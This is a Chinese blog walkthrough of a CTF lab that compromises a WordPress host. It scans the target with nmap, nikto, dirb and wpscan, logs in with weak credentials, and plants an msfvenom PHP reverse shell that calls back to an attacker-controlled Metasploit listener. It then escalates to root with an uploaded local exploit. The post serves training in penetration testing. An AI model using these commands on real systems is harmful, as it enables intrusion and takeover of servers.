7-3CTF夺旗入门教程--综合测试(高难度内核提权)

最新推荐文章于 2022-09-29 14:08:04 发布
最新推荐文章于 2022-09-29 14:08:04 发布
阅读量779 收藏 3
点赞数
分类专栏: CTF学习 文章标签: 安全 php wordpress linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46622606/article/details/106038858
版权
1. 信息探测
#扫描主机服务信息以及服务版本
nmap -sV 192.168.2.117
#快速扫描主机全部信息
nmap -T4 -A -v 192.168.2.117
#探测敏感信息
nikto -host http://192.168.2.117
dirb http://192.168.2.117
2.深入挖掘

分析nmap、nikto扫描结果
浏览器访问敏感页面
查看是否有CMS,是否具有可以直接利用的漏洞

#枚举wordpress主题、插件、用户名
wpscan --url http://192.168.2.117/wordpress/ --enumerate at --enumerate ap --enumerate u

在这里插入图片描述
尝试弱口令登录admin/admin,登录成功
在这里插入图片描述
如果没有弱口令,则考虑利用弱点:

  • 登录界面是否存在SQL注入
  • 敏感信息是否泄漏
  • 已知漏洞
  • backup.zip文件
  • 是否存在弱口令
3.生成webshell

在这里插入图片描述

#启动metasploit监听
> use exploit/multi/handler
> set payload linux/x86/meterpreter/reverse_tcp
> set lhost 192.168.2.119
> set lport 4444
> run
#生成shell
msfvenom -p php/meterpreter/reverse_tcp lhost-192.168.2.119 lport=4444 -f raw > /home/kali/Desktop/shell.php
4.上传webshell获取控制权

上传到wordpress后台theme/editor下
在这里插入图片描述
执行shell,获取反弹shell

http://192.168.2.117/wordpress/wp-content/themes/twentyfourteen/404.php

查看系统信息
sysinfo
查看用户权限
id

5.寻找系统EXP root服务器

登录服务器后,反弹shell的用户是www-data或其他低权限用户。
使用sudo -l 查看用户权限

使用searchsploit查找本地溢出的EXP、在meterpreter中使用upload /home/kali/Desktop/exp
上传EXP,执行,提升权限
在这里插入图片描述
编译该代码
在这里插入图片描述
上传shellroot
upload /home/kali/Desktop/shellroot
shell
chmod 777 shellroot
./shellroot
#返回root权限
whoami

The Riddler.
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
7月31日CTF文件漏洞训练
slc3315的博客
07-31 1328
题记 今天主要是文件上传及下载,高难度第三题 一、文件包含 题目: 思路: 文件包含,右键源代码,利用data、filte等伪协议传参 步骤一:发现注入点 右键源代码发现php链接 新页面点击后快速结束,需要抓包 步骤二:伪协议 分析上述代码发现传参file,同时屏蔽了tp、input、data等协议。同时增加了一个flag.php(直接打开可不行) 本页面上编辑伪协议 file=php://filter/read=convert.base64-encode/resource=flag.php bas
stripe-ctf-2.0:夺旗
05-19
《Stripe CTF 2.0:网络版夺旗赛详解》 Stripe CTF(Capture The Flag)2.0 是一场网络安全竞赛,源自2012年8月22日至29日期间举办的一系列挑战。这个活动的目标是通过解决各种安全问题来提升参与者的网络安全技能...
CTF-综合测试(高难度)【超详细】
不知名白帽的博客
09-09 1万+
CTF-综合测试(高难度)【超详细】
实验吧CTF题库——貌似有点难
weixin_34245082的博客
11-14 776
貌似有点难 不多说,我们点开链接看看题目吧。 点开链接,我们看到的是这么一个界面,Tips View the source code。(提示我们查看源代码) 我们点开View the source code,查看本题的源代码。 我们看下面这几行代码 if ($GetIPs=="1.1.1.1") {echo "Great! Key is ...
CTF-提权
su__xiaoyan的博客
01-06 2056
提权 通过Web服务拿下服务器的基础权限以后(www-data),如何提权值最高的系统权限(root)。 提权的前提条件: 获取服务器的基础权限。 能上传或者下载文件。 靶机上面有常见工具或者环境,例如nc,python或者Perl。 Linux操作系统提权方法: 利用内核漏洞进行提权 利用错误的系统配置进行提权 明文密码提权 计划任务提权 密码复用提权 内核漏洞提权 首先查看系统Linux的发行版本: cat /etc/issue cat /etc/*-release 查看内核版本
可编程控制器_S7-1500_S7-1500编程入门_
10-01
西门子的编程语言主要基于IEC 61131-3标准,支持Ladder Diagram(梯形图)、Structured Text(结构文本)、Function Block Diagram(功能块图)等多种编程方式。对于初学者,梯形图是最直观的选择,它以电气继电器...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
PNG图片宽高一把梭 ctf-misc 杂项 直接还原图片原本高度 CRC计算 暴力破解
最新发布
02-07
ctf-misc 杂项 直接还原图片原本高度 CRC计算 暴力破解 直接还原图片原本高度 直接还原图片原本高度 直接还原图片原本高度 直接还原图片原本高度 直接还原图片原本高度 直接还原图片原本高度 直接还原图片原本高度 ...
saigar-ctf:Saigar CTF 平台
05-29
赛加尔CTF世界上第一个众包调查的 CTF 平台介绍Saigar CTF 是一个开源 CTF 平台,用于促进众包调查,可以扩展到数百个具有实时数据的并发用户。 Saigar CTF 平台促成的最大事件有500 多个用户,在6 小时内提交了8,...
CTF攻防练习之综合训练1
weixin_30699235的博客
06-20 234
主机:192.168.32.152 靶机:192.168.32.166 首先使用nmap,nikto -host ,dirb扫描,探测靶场开放了 21,22,80d端口已经发现有一下关键信息 进入login登录界面 查看源代码发现一段php函数, 审计这段代码,过滤了' 很有可能存在sql注入, 且需要构造用户名为@btrisk.com functio...
【实战】一次艰难的***提权,成功拿下服务器
weixin_34408717的博客
02-24 211
前言:这是在51CTO的第10篇文章,给大家来点给力的哈~这次的***检测在提权反弹连接上遇到了很多问题,让窝娓娓道来。Let's Go!一,对目标网站的信息收集。http://www.XXXXX.cn IP:122.225.XX.XXX [浙江省嘉兴市 电信]Server ...
15.CTF-web安全提权
woo233的博客
09-29 1888
往往我们能拿下服务器的web服务只是具有低权限用户(www-data),对于内网渗透,我们需要提权到root。Linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置。提权前提:已经拿到低权shell被入侵的机器上面有nc,python,perl等linux非常常见的工具有权限上传文件和下载文件。
CTF题目难度等级划分
m0_51193993的博客
11-18 3874
CTF题目难度等级(1-10): 难度等级 描述 用途 例子 最大分值 1 赛题的考点是非常常见的,选手们对于此类赛题可以直接进行解题步骤,并且在较短的时间内得到正确答案。该难度下通常不需要利用额外的工具,依靠通常电脑上有的程序便能够解题。 1. 通常用于ctf线上比赛的签到题;2. 对安全方向感兴趣但是没有去学习、或者刚刚接触安全方向的人员,此类主要是为了培养做题人的兴趣。 web: get/post请求、修改head头信息、cookie修改reverse:程序中直接明文包含flag,记事
CTF靶场内核漏洞提权 夜车星繁的博客
夜车星繁的博客
03-29 972
VMWARE虚拟机下搭建环境: 攻击机kali IP:192.168.223.136 攻击机win10:本机 靶 机IP:192.168.223.141 首先进行信息收集: nmap -sV 192.168.223.141 更详细的信息:nmap -T4 -A -v192.168.223.141 以上我们得知系统类型,Apache版本、所开放服务端口等重要信息 除...
21. 从一道CTF靶机来学习mysql-udf提权
热门推荐
weixin_30527423的博客
11-28 1万+
这次测试的靶机为Raven: 2 这里是CTF解题视频地址:https://www.youtube.com/watch?v=KbUUn3SDqaU 此次靶机主要学习PHPMailer 跟 mymql 的UDF提权。 扫描网站目录发现,还是wordpress搭建的,尝试使用wpscan对靶机进行扫描: 得到用户。 翻看爆破出来的目录,发现 http://192.168.0.14...
BuuCTF难题详解| Misc | [HDCTF2019]你能发现什么蛛丝马迹吗
pone2233的博客
12-15 1743
题目介绍 这道题目,是一道非常典型的内存取证的题目,相信会了这道题目,大家会对内存取证更加喜欢。 [HDCTF2019]你能发现什么蛛丝马迹吗 下载文件一看就是一个内存取证的题目,我们先看看版本 :volatility.exe -f memory.img imageinfo Volatility Foundation Volatility Framework 2.6 INFO : volatility.debug : Determining profile based on KDBG sear
CTF-常见的几种web提权方法
Reaches_r的博客
08-10 1443
1.内核漏洞提权 2.明文密码暴力破解3.计划任务 4.密码复用 5.利用zip、tar提权
权限提升总结
Christ1na的博客
03-07 6153
提权 内网
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值